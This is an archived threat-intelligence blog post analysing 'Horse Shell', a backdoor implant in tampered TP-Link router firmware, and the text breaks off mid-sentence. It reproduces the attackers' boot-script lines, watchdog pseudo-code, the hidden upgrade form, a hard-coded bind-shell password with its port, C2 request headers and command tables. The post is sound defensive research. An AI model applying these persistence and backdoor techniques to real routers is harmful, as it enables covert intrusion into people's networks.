{ "id": "39cc2b4f-ebb0-4fbe-9dd6-c3f744ae601b", "created_at": "2026-04-14T02:22:24.564522Z", "updated_at": "2026-04-14T17:01:38.806648Z", "deleted_at": null, "sha1_hash": "13c5456ff4455241428ebd8ebd5277ac5b53fb90", "title": "The Dragon Who Sold His Camaro: Analyzing Custom Router Implant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 207934, "plain_text": "The Dragon Who Sold His Camaro: Analyzing Custom Router\r\nImplant\r\nBy itayc\r\nPublished: 2023-05-16 · Archived: 2026-04-14 02:06:10 UTC\r\nResearch by: Itay Cohen, Radoslaw Madej, and the Threat Intelligence Team\r\nOver the past few months, Check Point Research has closely monitored a series of targeted attacks aimed at\r\nEuropean foreign affairs entities. These campaigns have been linked to a Chinese state-sponsored APT group we\r\ntrack as Camaro Dragon, which shares similarities with previously reported activities conducted by state-sponsored Chinese threat actors, namely Mustang Panda.\r\nOur comprehensive analysis of these attacks has uncovered a malicious firmware implant tailored for TP-Link\r\nrouters. The implant features several malicious components, including a custom backdoor named “Horse Shell”\r\nthat enables the attackers to maintain persistent access, build anonymous infrastructure and enable lateral\r\nmovement into compromised networks.\r\nThe discovery is yet another example of a long-standing trend of Chinese threat actors to exploit Internet-facing\r\nnetwork devices and modify their underlying software or firmware. This blog post will delve into the intricate\r\ndetails of analyzing the “Horse Shell” router implant. We will share our insights into the implant’s functionality\r\nand compare it to other router implants associated with Chinese state-sponsored groups. By examining this\r\nimplant, we hope to shed light on the techniques and tactics utilized by the Camaro Dragon APT group and\r\nprovide a better understanding of how threat actors utilize malicious firmware implants in network devices in their\r\nattacks.\r\nKey Findings\r\nCheckpoint Research has discovered and analyzed a custom firmware image affiliated with the Chinese\r\nstate-sponsored actor “Camaro Dragon”.\r\nThe firmware image contained several malicious components, including a custom MIPS32 ELF implant\r\ndubbed “Horse Shell”. In addition to the implant, a passive backdoor providing attackers with a shell to\r\ninfected devices was found.\r\n“Horse Shell”, the main implant inserted into the modified firmware by the attackers, provides the attacker\r\nwith 3 main functionalities:\r\nRemote shell — Execution of arbitrary shell commands on the infected router\r\nFile transfer — Upload and download files to and from the infected router.\r\nSOCKS tunneling — Relay communication between different clients.\r\nDue to its firmware-agnostic design, the implant’s components can be integrated into various firmware by\r\ndifferent vendors\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 1 of 45\n\nThe deployment method of the firmware images on the infected routers is still unclear, as well as its usage\r\nand involvement in actual intrusions.\r\nBackground\r\nSince January 2023, Check Point Research is tracking sophisticated attacks targeting officials in multiple\r\nEuropean countries. The campaign leveraged a wide variety of tools, among them implants commonly associated\r\nwith Chinese state-sponsored threat actors. This activity has significant infrastructure overlaps with activities\r\npublicly disclosed by our fellow researchers in Avast and ESET, linking it to “Mustang Panda”. This cluster of\r\nactivity is currently tracked by CPR as “Camaro Dragon”.\r\nThrough our detailed analysis of files and infrastructure associated with this campaign, we have discovered a trove\r\nof files and payloads used by the group. Among these files, there were two that caught our attention. These were\r\ntwo modified TP-Link router firmware images. As we dug further, it became evident those were tempered with,\r\nadding several malicious components to the original firmware, including a custom implant dubbed “Horse Shell”.\r\nThe implanted components were discovered in modified TP-Link firmware images. However, they were written in\r\na firmware-agnostic manner and are not specific to any particular product or vendor. As a result, they could be\r\nincluded in different firmware by various vendors. While we have no concrete evidence of this, previous incidents\r\nhave demonstrated that similar implants and backdoors have been deployed on diverse routers and devices from a\r\nrange of vendors.\r\nUncovering the Implants\r\nWhen faced with a large number of files, it is necessary to quickly triage and filter them to identify those that are\r\nmore relevant for further inspection. To do this, there are several strategies that can be employed, one of which\r\ninvolves understanding the type of files that are being dealt with.\r\nIt is important to note that certain file types are more likely to contain relevant information than others. For\r\ninstance, graphic images and icons may not be as significant as executable and firmware files. Therefore, to filter\r\nthrough the large number of files in question, we decided to employ the Linux file command, which helped us\r\ndetermine the file types.\r\nUpon running the command, we discovered that two of the files were TP-Link firmware images of a rather dated\r\nmodel, WR940, that was initially released around 2014.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n9404.bin: firmware 940 v4 TP-LINK Technologies ver. 1.0, version 3.16.9, [...]\r\n9406.bin: firmware 940 v6 TP-LINK Technologies ver. 1.0, version 3.20.1, [...]\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 2 of 45\n\n9404.bin: firmware 940 v4 TP-LINK Technologies ver. 1.0, version 3.16.9, [...] 9406.bin: firmware 940 v6 TP-LINK Technologies ver. 1.0, version 3.20.1, [...]\r\n9404.bin: firmware 940 v4 TP-LINK Technologies ver. 1.0, version 3.16.9, [...]\r\n9406.bin: firmware 940 v6 TP-LINK Technologies ver. 1.0, version 3.20.1, [...]\r\nThe output of our query showcased that both files pertained to the same model of TP-Link router, albeit intended\r\nfor different hardware versions, specifically v4 and v6, respectively. The presence of these router firmware files,\r\nsituated alongside dubious files and tools at the hands of an advanced threat actor, undoubtedly raised suspicion\r\nand warranted a thorough investigation.\r\nAs the firmware claimed to be for the TP-Link router model WR940N, we aimed to compare the original firmware\r\nof both v4 and v6 with the ones we had obtained, analyzing any potential differences. To do so, we procured the\r\noriginal firmware for this model from the TP-Link website, meticulously scrutinizing each component to identify\r\nany discrepancies.\r\nUpon inspection, we discovered that the kernel and the uBoot of both firmware versions were identical, indicating\r\nthat they had not been tampered with by the attackers. However, the filesystems were notably distinct, prompting\r\nus to extract and compare them. The firmware are using a custom implementation of SquashFS. To extract the\r\nfilesystem we used sasquatch. We carried out a meticulous file-by-file comparison. Our aim was to identify which\r\nfiles had been modified, added, or removed, if any.\r\nBy conducting a meticulous analysis of each file, we aimed to discern which files had been modified, added, or\r\nremoved from the suspicious firmware we had encountered. In doing so, we hoped to uncover any potential\r\nalterations made by the threat actor.\r\nAnd indeed, we found that multiple files were added to the firmware we obtained, and a couple of files were\r\nmodified:\r\nFiles added:\r\n/usr/bin/sheel\r\n/usr/bin/shell\r\n/usr/bin/timer\r\n/usr/bin/udhcp\r\nFiles Modified:\r\n/etc/rc.d/rcS\r\n/web/userRpm/SoftwareUpgradeRpm.htm\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 3 of 45\n\nFigure 1: Overview of the different components in the malicious implant.\r\nInitial Infection\r\nWe are unsure how the attackers managed to infect the router devices with their malicious implant. It is likely that\r\nthey gained access to these devices by either scanning them for known vulnerabilities or targeting devices that\r\nused default or weak and easily guessable passwords for authentication. The goal of the attackers appears to be the\r\ncreation of a chain of nodes between main infections and real command and control, and if so, they would likely\r\nbe installing the implant on arbitrary devices with no particular interest.\r\nIt is worth noting that this kind of attack is not aimed specifically at sensitive networks, but rather at regular\r\nresidential and home networks. Therefore, infecting a home router does not necessarily mean that the homeowner\r\nwas a specific target, but rather that their device was merely a means to an end for the attackers.\r\nInspecting the Modified Files\r\nSoftwareUpgradeRpm.htm\r\nThe TP-Link router, like many routers, has a web interface that allows its users to configure the router and manage\r\nit. One of the features of the management website provides the user with the option to manually upgrade their\r\ndevice’s firmware version. The web form for uploading a new firmware exists in SoftwareUpgradeRpm.htm .\r\nThis page, on the original and legitimate firmware we obtained from the official TP-Link website, is shown in the\r\nimage below.\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 4 of 45\n\nFigure 2: SoftwareUpgradeRpm.htm as shown in the original interface\r\nHowever, in the modified version of the firmware we obtained, a small CSS property was inline added to the\r\nHTML form. This property, display:none , will hide the form from a user entering the page.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n\u003cFORM action=\"../incoming/Firmware.htm\" enctype=\"multipart/form-data\" method=\"post\" onSubmit=\"return\r\ndoSubmit();\" style=\"display: none;\"\u003e\r\n\u003cFORM action=\"../incoming/Firmware.htm\" enctype=\"multipart/form-data\" method=\"post\" onSubmit=\"return\r\ndoSubmit();\" style=\"display: none;\"\u003e\r\n\u003cFORM action=\"../incoming/Firmware.htm\" enctype=\"multipart/form-data\" method=\"post\" onSubmit=\"return\r\nHiding the form, will not remove it or the feature from the HTML itself, so users can technically still manually\r\nupgrade their firmware version. Although now, it will be harder to perform the upgrade or even know that this\r\nfeature exists.\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 5 of 45\n\nFigure 3: The malicious image hides from a user the ability to flash another firmware image\r\n/etc/rc.d/rcS\r\nThe attackers modified the /etc/rc.d/rcS which is part of the operating systems’ boot scripts. To this\r\ninitialization script, the attackers added the following three shell commands to execute three of the files added to\r\nthe modified firmware.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n/usr/bin/udhcp \u0026\r\n/usr/bin/shell \u0026\r\n/usr/bin/timer 60 \u0026\r\n/usr/bin/udhcp \u0026 /usr/bin/shell \u0026 /usr/bin/timer 60 \u0026\r\n/usr/bin/udhcp \u0026\r\n/usr/bin/shell \u0026\r\n/usr/bin/timer 60 \u0026\r\nThe rcS script is usually one of the first scripts to be executed during the system boot process, as it performs\r\ntasks that are essential to bringing up the rest of the system. Upon system boot-up, the rcS script would\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 6 of 45\n\nautomatically launch all three binaries, thereby ensuring the persistence of the infection on the compromised\r\ndevice.\r\nAnalyzing the Added Files\r\nBy now, we saw that the attackers modified two files and added 4 files to the altered router firmware, 3 of them\r\nare executed by the modified initialization script. To understand what they do, we need to analyze each of the\r\nfiles. Since the router is a MIPS device, the binaries we’ll analyze are all compiled for MIPS32BE architecture.\r\nLet’s start.\r\nshell — Passive Backdoor\r\nThe shell binary is a simple password-protected bind shell that will bind to all IPv4 network interfaces on port\r\n14444. The password can be revealed with the highly advanced, exceedingly unique tool called strings .\r\nShould you require the password, simply run the following command:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$ strings shell\r\n[..]\r\npassword:\r\nJ2)3#4G@Iie\r\nsuccess!\r\n/bin/sh\r\n[..]\r\n$ strings shell [..] password: J2)3#4G@Iie success! /bin/sh [..]\r\n$ strings shell\r\n[..]\r\npassword:\r\nJ2)3#4G@Iie\r\nsuccess!\r\n/bin/sh\r\n[..]\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 7 of 45\n\nAs you can see, the password is hidden away in plain sight, waiting to be extracted by the adept researcher. With\r\nthis information in hand, access to the elusive shell is granted, allowing for unrestricted entry into the system. May\r\nthe force be with strings !\r\nsheel\r\nThe sheel binary is a utility for configuration writing and reading. It was meant to be executed manually as it\r\nwasn’t written to the modified init script. It reads and writes to the /dev/mtdblock4 device. Why would it do so,\r\na curious reader might ask? Before we answer this question, we first need to set the scene. The /dev/mtdblock4\r\npartition on this particular model of the router is in fact a so-called ART partition, which stands for Atheros Radio\r\nTest. It is supposed to contain calibration data for the WiFi chipset.\r\nCuriously, the sheel binary uses this partition to store data in a raw format. And not just any data – its purpose is\r\nto write and read the C2 domains used by the main implant ( udhcp ) which is described further below. The\r\nobvious reason for writing data in a raw format on a block device is to make it less obvious to be spotted by a\r\nrouter administrator.\r\nThe sheel binary allows to write addresses of up to five C2 servers inside the partition. In case the operator\r\ndidn’t know how to use it, authors included helpful hint, even marking the optional arguments in brackets:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n./sheel -h server_ip -p server_port -i update_index[0-4] [-r]\r\n./sheel -h server_ip -p server_port -i update_index[0-4] [-r]\r\n./sheel -h server_ip -p server_port -i update_index[0-4] [-r]\r\ntimer\r\nThe timer executable is a basic watchdog that is initiated during the boot process. It operates by attempting to\r\nexecute the added udhcp executable at regular intervals, where the length of these intervals is determined by a\r\nnumber passed to it as a command line argument. The udhcp executable is the main implant in the modified\r\nfirmware, as we will discuss shortly. When udhcp is launched, it verifies the presence of a file named\r\n/var/udhcp . If the file exists and is locked, udhcp terminates as it understands that another instance of itself is\r\nalready running. However, if it does not exist, udhcp creates the file and writes its own process ID to it. The\r\ntimer binary, by executing udhcp again and again, provides an additional layer of persistence, ensuring that\r\nthe primary implant remains active.\r\nThe implementation is very simple, and as a reconstructed pseudo-code, it will look like this:\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 8 of 45\n\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nint32_t main(int32_t argc, char** argv, char** envp)\r\n{\r\ndaemon(1, 0);\r\nint32_t seconds;\r\nif (argc \u003e= 2)\r\n{\r\nseconds = atoi(argv[1]);\r\n}\r\nelse\r\n{\r\nseconds = 3600;\r\n}\r\nwhile (true)\r\n{\r\nsleep(seconds);\r\nsystem(\"/usr/bin/udhcp\");\r\n}\r\n}\r\nint32_t main(int32_t argc, char** argv, char** envp) { daemon(1, 0); int32_t seconds; if (argc \u003e= 2) { seconds =\r\natoi(argv[1]); } else { seconds = 3600; } while (true) { sleep(seconds); system(\"/usr/bin/udhcp\"); } }\r\nint32_t main(int32_t argc, char** argv, char** envp)\r\n{\r\n daemon(1, 0);\r\n int32_t seconds;\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 9 of 45\n\nif (argc \u003e= 2)\r\n {\r\n seconds = atoi(argv[1]);\r\n }\r\n else\r\n {\r\n seconds = 3600;\r\n }\r\n while (true)\r\n {\r\n sleep(seconds);\r\n system(\"/usr/bin/udhcp\");\r\n }\r\n}\r\nAnalyzing Horse Shell (udhcp)\r\nThe udhcp file is the main implant inserted into the modified firmware by the attackers. Parts of it are internally\r\nnamed Horse Shell so we use it to name the implant as a whole. The implant provides the attacker with 3 main\r\nfunctionalities: remote shell, file transfer, and tunneling.\r\nIn the following parts, we will dive deeper into the implementation of the different components, we’ll explain the\r\nfunctionality of Horse Shell and how it is implemented.\r\nStatic Analysis\r\nudhcp is a binary compiled for MIPS32 MSB operating system and written in C++. Many embedded devices and\r\nrouters are running MIPS-based operating systems, and TP-Link routers are no different.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$ file ./udhcp\r\nudhcp: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter\r\n/lib/ld-uClibc.so.0, stripped\r\n$ file ./udhcp udhcp: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked,\r\ninterpreter /lib/ld-uClibc.so.0, stripped\r\n$ file ./udhcp\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 10 of 45\n\nudhcp: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interprete\r\nEven though the implant is not easy to analyze, the static information embedded in it makes the analysis a little bit\r\nsimpler. In spite of it being shown as “stripped”, it is full of meaningful strings such as source file names, debug\r\nlog messages, function names, names of global variables, and assert messages. Executing strings against the\r\nbinary will reveal meaningful information that can give a researcher a good idea of what they’re dealing with.\r\nInitializing\r\nHorse Shell execution begins by instructing the system not to terminate it when receiving the SIGPIPE , SIGINT\r\nor SIGABRT signals. Then it calls a function named horse_main which is the main function of the implant. In\r\nthis context, “horse” may refer to Trojan Horse.\r\nUpon invocation, the implant issues a daemon(1, 0) call, which instructs the operating system to detach it from\r\nthe controlling terminal and run it in the background as a daemon. It then verifies the existence of the file\r\n/var/udhcp . If the file exists, Horse Shell assumes that another instance of the implant is already running and\r\nimmediately terminates. Conversely, if the file is non-existent, the implant creates it, setting its permissions to\r\nrw-r--r-- . The newly created file then serves as a type of mutex that the Horse Shell writes the current PID to,\r\nhelping to avoid concurrency issues.\r\nThe implant creates a file /var/udhcp.cnf and writes the command kill -9 [PID] to it, [PID] being udhcp’s\r\nprocess ID. It’s unclear how the file is used or what purpose it serves. One suggestion is that it can be used by the\r\nattackers to easily terminate the running implant.\r\nConfiguration\r\nMost of Horse Shell’s configuration is hard coded. However, some of the entries are dynamically configurable.\r\nThe instance obtained by us is using m.cremessage[.]com on port 80 as its default command and control server.\r\nIt will write this domain to /dev/mtdblock4 . For non-default peers, it reads a list of peer hosts from\r\n/dev/mtdblock4 . On an actively infected device, this MTD block can contain values inserted into it by using the\r\naforementioned sheel utility, or by old versions of the implant that were flashed to the device. It will resolve\r\nevery host to its IP address and check if it’s up and running. If it does, it will continue the initialization of the\r\nconfiguration.\r\nHorse Shell operates as a single-threaded application and adopts an event-driven methodology to direct its\r\nexecution. It makes extensive use of the open-source library, libev , for I/O events and invokes callback\r\nfunctions in response to specific events. In essence, the program’s progression is dictated by the events that occur,\r\nhence analyzing the implant warrants consideration of the events and their associated callbacks. During the\r\nconfiguration initialization phase, it sets up various events and associates callbacks to respond to circumstances\r\nsuch as reading and writing to sockets or establishing a connection.\r\nIn its configuration, the implant stores information such as IPs and Port of the command and controls, swap\r\ninitializes libev structures for network and timer events, cryptographic context, callbacks, pointers to important\r\nstructures like a linked list that holds active connections, etc.\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 11 of 45\n\nInitial Connection\r\nUpon finishing configuring itself, Horse Shell will start a ev_timer structure that will trigger a callback function\r\nperiodically. When triggered, the function will check when it was last executed, and send a heartbeat message to\r\nall the established connections.\r\nThen, the implant will try to connect to the command and control. When the initial connection is successfully\r\nestablished, Horse Shell will send to the peer a list of information about the infected device. This information is\r\nbeing sent frequently and not only once. The information sent by the implant contains:\r\nUser name\r\nSystem name\r\nOS version\r\nOS time\r\nCPU architecture\r\nNumber of CPUs\r\nTotal RAM\r\nIP address\r\nMAC address\r\nFeatures supported by the implant (remote shell, tunneling, file transfer)\r\nNumber of active connections\r\nSome of the information sent, such as support functionalities and CPU architecture, can suggest that the implant\r\nhas other versions that support different devices (i.e. non MIPS devices) and a different set of functionalities.\r\nCommunication\r\nHorse Shell communicates with its peers and server on a port specified for each of them individually. By default,\r\nit is using port 80 for communication. Regardless of the port, it uses HTTP communication with hard-coded HTTP\r\nheaders. Every communication by the implant is encrypted using a custom or modified encryption scheme that is\r\nbased on Substitution-Permutation Network. Every message is encrypted upon sending and decrypted when\r\narrives at the implant.\r\nA request sent from the implant will have this structure:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nPOST http:/[domain]/index.php HTTP/1.1\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 12 of 45\n\nAccept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, application/vnd.ms-powerpoint,\r\napplication/vnd.ms-excel, */*\r\nAccept-Language: en-US, zh-CN;q=0.5\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; qdesk 2.4.1265.203; SLCC2;\r\n.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nAccept-Encoding: gzip, deflate\r\nHost: [domain]\r\nConnection: Keep-Alive\r\nPOST http:/[domain]/index.php HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif,\r\napplication/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword,\r\napplication/vnd.ms-powerpoint, application/vnd.ms-excel, */* Accept-Language: en-US, zh-CN;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; qdesk 2.4.1265.203; SLCC2; .NET\r\nCLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3) Accept-Encoding: gzip, deflate Host:\r\n[domain] Connection: Keep-Alive\r\nPOST http:/[domain]/index.php HTTP/1.1\r\nAccept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, appli\r\nAccept-Language: en-US, zh-CN;q=0.5\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; qdesk 2.4.1265.203; SLCC2\r\nAccept-Encoding: gzip, deflate\r\nHost: [domain]\r\nConnection: Keep-Alive\r\n[encrypted message]\r\nThe hard-coded headers hasn’t much to do with the actual data sent. In fact, searching this header online led us to\r\nsee the exact same HTTP headers on several coding forums and repositories on Chinese websites like CSDN. The\r\nAccept-Language header field in all messages transmitted from the implant includes the language code zh-CN ,\r\nexcept for one instance. This occurs when the implant sends its initial transmission message containing details\r\nabout the compromised device, where the Chinese language code is absent from the request. Instead, the attackers\r\nhave included the HTTP headers with Accept-Language: en-US . It is possible that the attackers intentionally\r\nomitted the language code from the request to conceal any indication of their identity that might be inferred from\r\nthe language used.\r\nHorse Shell is designed to communicate with numerous peers simultaneously. As it lacks multi-threading\r\ncapabilities, the program employs list containers to segregate the various connected peers as individual list items.\r\nEach peer has a distinct structure, with assigned events and callbacks specific to it. This approach guarantees that\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 13 of 45\n\nthe communication with each peer remains distinct, utilizing its unique callbacks and event handlers, and does not\r\nbecome intertwined with other peers.\r\nThe message structure differs between different types of communication conducted by the implant. Although the\r\noverall structure is similar, each functionality within the implant has its distinct nuances and particulars. For\r\ninstance, the structure of communication related to tunneling will differ from that of a remote shell. However, the\r\nHTTP header in the requests remains consistent across all communication types.\r\nCommands and Functionalities\r\nEach functionality has its own list of supported commands. When a new connection is received, it will be parsed\r\nand handled by the callback function that handles read events triggered from the peer’s socket. It will check if the\r\npacket is requesting to open a new type of connection from the following options:\r\nCommand Subcommand Description\r\n0x1 0x2 Start remote shell (”Horse Shell”)\r\n0x2 0x2 Start SOCKS tunneling\r\n0x3 0x2 Start file transfer\r\nRemote Shell\r\nWhen a peer requests to initiate a new remote shell instance, the program will verify the existence of /bin/bash\r\nor /bin/sh on the device. If either of them exists, the program will generate a new session using the tsession\r\nstructure implementation from the Telnet open-source project. This Telnet-based connection provides the attacker\r\nwith complete shell access to the compromised device.\r\nIt’s important to note that the remote shell feature utilizes an embedded Telnet library while it still functions\r\nthrough the implant’s HTTP-based communication. However, the communication between the compromised\r\ndevice and the peer seems unencrypted.\r\nSupported commands\r\nCommand ID Name Description\r\n0x1 REQ_CONNECT_PORT Create a new shell connection\r\nFile Transfer\r\nThe file transfer module supports downloading and uploading files to and from the infected device, as well as\r\nbasic file manipulation functionality.\r\nThis functionality is important as the attackers may need to upload new modules or tools onto a compromised\r\nsystem to perform specific tasks, such as conducting reconnaissance, stealing data, or moving laterally within a\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 14 of 45\n\ntarget network. These modules or tools may be customized for the specific target or scenario, and may not be\r\npresent on the compromised system initially.\r\nIn addition, although not very useful for devices such as routers, the threat actors can use this module for data\r\nexfiltration or collect different logs from the device.\r\nSupported Commands\r\nCommand\r\nID\r\nName Description\r\n0x1 FILE_TRANSFER_REQ_CONNECT_PORT Initiate connection\r\n0x2 FILE_TRANSFER_OPER_UPLOAD_CHECK\r\nCheck for active\r\nUpload task\r\n0x3 FILE_TRANSFER_OPER_DOWNLOAD_CHECK\r\nCheck for active\r\nDownload task\r\n0x4 FILE_TRANSFER_OPER_QUERY Query directory list\r\n0x6 FILE_TRANSFER_OPER_DELETE\r\nDelete a file from the\r\ndevice\r\n0x7 FILE_TRANSFER_OPER_UPLOAD\r\nCreate a file on the\r\ndevice\r\n0x8 FILE_TRANSFER_OPER_DOWNLOAD\r\nDownload a file from\r\nthe device\r\n0x9 FILE_TRANSFER_OPER_CHECK_EXISTS\r\nCheck if the file\r\nexists\r\n0xa FILE_TRANSFER_OPER_CANCEL_UPLOAD Cancel Upload task\r\n0xb FILE_TRANSFER_OPER_CANCEL_DOWNLOAD\r\nCancel Download\r\ntask\r\n0xc FILE_TRANSFER_TRANS_FILE_DATA\r\nWrite file contents to\r\nthe device\r\n0x14 REQ_MODULE_HEARTBEAT Heartbeat\r\nTunneling\r\nThe implant can relay communication between two nodes. By doing so, the attackers can create a chain of nodes\r\nthat will relay traffic to the command and control server. By doing so, the attackers can hide the final command\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 15 of 45\n\nand control, as every node in the chain has information only on the previous and next nodes, each node being an\r\ninfected device. Only a handful of nodes will know the identity of the final command and control.\r\nBy using multiple layers of nodes to tunnel communication, threat actors can obscure the origin and destination of\r\nthe traffic, making it difficult for defenders to trace the traffic back to the C2. This makes it harder for defenders to\r\ndetect and respond to the attack.\r\nIn addition, a chain of infected nodes makes it harder for defenders to disrupt the communication between the\r\nattacker and the C2. If one node in the chain is compromised or taken down, the attacker can still maintain\r\ncommunication with the C2 by routing traffic through a different node in the chain.\r\nSupported commands\r\nCommand\r\nID\r\nName Description\r\n0x1 SOCKS_TUN_REQ_CONNECT_PORT\r\nCheck if the port\r\nis available for\r\nconnection\r\n0x4 SOCKS_TUN_NATPORT_COMM_CMD_OPEN\r\nOpen connection\r\non port\r\n0x5 SOCKS_TUN_NATPORT_COMM_CMD_CONNECT\r\nEstablish a\r\nconnection\r\nbetween two\r\nnodes ip1:port1\r\n\u003c–\u003e ip2:port2\r\n0x6 SOCKS_TUN_NATPORT_COMM_CMD_DATA\r\nTransfer data\r\nbetween\r\nconnected nodes\r\n0x7 SOCKS_TUN_NATPORT_COMM_CMD_DISCONNECT\r\nDisconnect\r\ntunnel between\r\ntwo nodes\r\n0x8 SOCKS_TUN_NATPORT_COMM_CMD_CLOSE\r\nMark tunnel as\r\nclosed\r\n0xa SOCKS_TUN_NATPORT_COMM_CMD_CHECK\r\nCheck for new\r\ncommands\r\n0x14 SOCKS_TUN_REQ_MODULE_HEARTBEAT Heartbeat\r\nCharacteristics\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 16 of 45\n\nRouter implants are not something very popular. Sure, there are infamous malware like Mirai and its numerous\r\noffshoots, and a handful of Linux-based botnets still lingering out there, but let’s be honest – it’s not exactly the\r\nmost happening party in town.\r\nHowever, in recent years we see Chinese threat actors’ increasing interest in compromising edge devices, aiming\r\nto both build resilient and more anonymous C\u0026C infrastructures and to gain a foothold in certain targeted\r\nnetworks. In the following section, we list some interesting and unique development decisions taken by the Horse\r\nShell developers and will compare them to another well-known implant used by Chinese espionage group APT31.\r\nUsage of Open Source Projects\r\nThe implant smartly integrated multiple open-source libraries in its code. Its remote shell is based on Telnet,\r\nevents are handled by libev , it has libbase32 in it, ikcp too, and its list containers are based on TOR’s\r\nsmartlist , implementation. It might get inspiration from other projects such as Shadowsocks-libev and\r\nudptun for some of its functionality. Even its exact HTTP headers were taken from open-source repositories.\r\nStructures and Event-driven flow\r\nHorse Shell’s functionality isn’t groundbreaking, but certainly not run-of-the-mill either. However, its reliance on\r\nlibev to create a complex event-driven program, and its penchant for complex structures and list containers,\r\nmake our job of analyzing it all the more challenging. But, let’s not mince words – the code quality is impressive,\r\nand the implant’s ability to handle multiple tasks across a range of modules and structures demonstrates the kind\r\nof advanced skills that make us stand up and take notice.\r\nUnused Code\r\nThe vast majority of the functions in the implant are being used. However, a thorough examination has revealed\r\nthat there are certain functions and submodules that have been neglected and unused, like a lone sock lost in the\r\nlaundry. We saw unused functions from the JSON and IKCP open-source libraries, custom functions built for UDP\r\nhandling, and more.\r\nWhile it’s possible that these forsaken functionalities are simply leftovers from earlier versions or perhaps orphans\r\nthat belong to other variants for different devices, their purpose remains a mystery to us.\r\nCustom Crypto\r\nOh, the thrill of creating your very own cryptographic scheme! But alas, it’s not typically the wisest endeavor.\r\nHowever, the daring individuals behind Horse Shell have forged ahead with a custom or tweaked encryption\r\nscheme, built upon Substitution-Permutation Network. This scheme is utilized by the implant to encrypt and\r\ndecrypt the data it transmits and receives.\r\nDespite this being far from a best practice, we must begrudgingly admit that our investigations have thus far failed\r\nto reveal any conspicuous flaws in the implementation.\r\nComparison to Other Implants\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 17 of 45\n\nThe Horse Shell implant is written in C++ and compiled for MIPS32-based operating systems. There aren’t many\r\nimplants written for network devices and so we went to look for other examples, to see if the implant we’re\r\nlooking at is a variant of an already known implant. Spoiling the surprise, we were unable to find another implant\r\nthat we could confidently classify as a version of Horse Shell. Nonetheless, we did come across other implants\r\nthat share some similarities and were also associated with Chinese state-sponsored actors. It remains unclear\r\nwhether they are different variations of the same implant or not.\r\nOn July 2021, CERT-FR reported a large campaign conducted by the Chinese-affiliated threat actor APT31. They\r\ndiscovered that the actor used a mesh network of compromised routers orchestrated using malware they dubbed\r\n“Pakdoor”. A follow-up report that was released in December 2021 shares more information about the campaign\r\nas well as a technical analysis of Pakdoor. Security researcher @imp0rtp3 thoroughly analyzed Pakdoor and share\r\ntheir great analysis on their blog.\r\nLike Horse Shell, the Pakdoor implant also infects MIPS router devices, using event-driven execution flow based\r\non libev and makes heavy use of structs and open-source libraries. It seems like the two implants are sharing\r\nthe same goal of tunneling information between nodes as part of a chain of infected devices. The two also have the\r\ncapability to act as a Remote Access Tool, providing the attacker 